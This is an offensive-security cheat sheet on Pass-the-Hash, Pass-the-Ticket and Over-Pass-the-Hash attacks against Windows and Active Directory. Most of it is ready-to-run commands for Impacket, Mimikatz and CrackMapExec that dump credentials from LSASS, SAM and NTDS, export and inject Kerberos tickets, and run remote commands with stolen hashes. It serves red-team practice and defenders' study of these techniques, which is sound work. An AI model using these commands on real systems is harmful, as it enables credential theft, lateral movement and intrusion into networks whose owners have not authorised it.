# Pass-the-?

## Pass-the-Hash (PtH) Attacks

#### NTLM Hash Overview

**Service Purpose**: NTLM hashes are used for authentication in Windows environments, especially for local and SMB authentication.

**Why Target NTLM Hashes**: These hashes can be used directly for authentication without needing to crack the plaintext password, enabling immediate lateral movement.

#### Pass-the-Hash Attack

**Purpose**: Use extracted NTLM hashes to authenticate to other systems without knowing the plaintext password.

**Requirements**: NTLM hash of the user account, target systems that accept NTLM authentication

**Attack Value**: Immediate access to systems, works even with strong passwords, bypasses password complexity

#### NTLM Hash Extraction

**Using Impacket Tools**

```bash
# Extract NTLM hashes from compromised system
python3 secretsdump.py <domain>/<username>:<password>@<target-IP>

# Parse registry hives copied off a host (SAM/SECURITY/SYSTEM) offline with the LOCAL target
python3 secretsdump.py -sam <SAM-file> -security <SECURITY-file> -system <SYSTEM-file> LOCAL

# Extract cached credentials
python3 secretsdump.py <domain>/<username>:<password>@<target-IP> -cached
```

**Using Mimikatz (Windows)**

```powershell
# Extract from LSASS memory
mimikatz "privilege::debug" "sekurlsa::logonpasswords"

# Extract from SAM database
mimikatz "privilege::debug" "lsadump::sam"

# Extract cached credentials
mimikatz "privilege::debug" "lsadump::cache"
```

**Using CrackMapExec**

```bash
# Extract SAM hashes from multiple systems
crackmapexec smb <network-range> -u '<username>' -p '<password>' --sam

# Extract from domain controller
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --ntds
```

#### Pass-the-Hash Execution

**Using Impacket Tools**

```bash
# SMB authentication with hash (also used to browse file shares)
python3 smbclient.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>

# Remote command execution
python3 psexec.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>
python3 wmiexec.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>
python3 dcomexec.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>
```

**Using CrackMapExec**

```bash
# Pass-the-hash across network range
crackmapexec smb <network-range> -u '<username>' -H <NTLM-hash>

# Execute commands via PtH
crackmapexec smb <target-IP> -u '<username>' -H <NTLM-hash> -x "whoami"

# Dump additional credentials
crackmapexec smb <target-IP> -u '<username>' -H <NTLM-hash> --sam --lsa
```

***

## Pass-the-Ticket (PtT) Attacks

#### Kerberos Ticket Overview

**Service Purpose**: Kerberos tickets (TGT/TGS) are used for authentication in Active Directory environments, providing single sign-on capabilities.

**Why Target Kerberos Tickets**: Valid tickets can be extracted and reused on other systems to impersonate users without needing passwords or hashes.

#### Pass-the-Ticket Attack

**Purpose**: Extract and reuse Kerberos tickets to authenticate as other users on different systems.

**Requirements**: Valid Kerberos tickets (TGT or TGS), target systems in the same domain

**Attack Value**: User impersonation, session hijacking, privilege escalation

#### Kerberos Ticket Extraction

**Using Mimikatz (Windows)**

```powershell
# List current tickets
mimikatz "kerberos::list"

# Export all tickets
mimikatz "kerberos::list /export"

# Extract tickets from LSASS
mimikatz "privilege::debug" "sekurlsa::tickets /export"

# Target specific user's tickets
mimikatz "kerberos::list /user:<username> /export"
```

**Using Impacket Tools**

```bash
# Request a TGT with getTGT.py (when the password is known); it is written to <username>.ccache
python3 getTGT.py <domain>/<username>:<password>

# Tickets exported on Windows (.kirbi) must be converted to .ccache before Impacket can use them
python3 ticketConverter.py <ticket.kirbi> <ticket.ccache>
```

#### Pass-the-Ticket Execution

**Cross-Platform Ticket Conversion**

```bash
# Convert Mimikatz tickets (.kirbi) to Unix format (.ccache)
python3 ticketConverter.py <ticket.kirbi> <ticket.ccache>

# Convert ccache to kirbi
python3 ticketConverter.py <ticket.ccache> <ticket.kirbi>
```

**Using Impacket Tools**

```bash
# Set ticket in environment
export KRB5CCNAME=<ticket.ccache>

# Use ticket for authentication (no password needed)
python3 psexec.py <domain>/<username>@<target-server> -k -no-pass
python3 smbclient.py <domain>/<username>@<target-server> -k -no-pass
python3 wmiexec.py <domain>/<username>@<target-server> -k -no-pass
```

**Using Mimikatz (Windows)**

```powershell
# Inject ticket into current session
mimikatz "kerberos::ptt <ticket.kirbi>"

# Use injected ticket
dir \\<target-server>\c$
psexec \\<target-server> cmd
```

***

## Over-Pass-the-Hash (Pass-the-Key)

#### Hybrid Authentication Overview

**Service Purpose**: Over-pass-the-hash leverages NTLM hashes to request Kerberos tickets, combining the benefits of both authentication methods.

**Why Use Over-Pass-the-Hash**: Enables Kerberos authentication using only NTLM hashes, providing better stealth and compatibility than pure NTLM authentication.

#### Over-Pass-the-Hash Attack

**Purpose**: Use NTLM hashes or AES keys to request Kerberos TGTs, then use those tickets for authentication.

**Requirements**: NTLM hash or AES key, network access to a domain controller for the TGT request

**Attack Value**: Stealth (uses Kerberos), bypasses NTLM restrictions, enables advanced Kerberos attacks

#### Over-Pass-the-Hash Execution

**Using Impacket Tools**

```bash
# Request TGT using NTLM hash
python3 getTGT.py <domain>/<username> -hashes :<NTLM-hash>

# Request TGT using AES key
python3 getTGT.py <domain>/<username> -aesKey <AES-key>

# Use obtained TGT
export KRB5CCNAME=<username>.ccache
python3 psexec.py <domain>/<username>@<target-server> -k -no-pass
```

**Using Mimikatz (Windows)**

```powershell
# Over-pass-the-hash with NTLM
mimikatz "sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<NTLM-hash> /run:cmd"

# Over-pass-the-hash with AES256
mimikatz "sekurlsa::pth /user:<username> /domain:<domain> /aes256:<AES-key> /run:cmd"

# In the new cmd window, klist shows the TGT only after the first
# Kerberos authentication has been performed with the injected key
klist
```
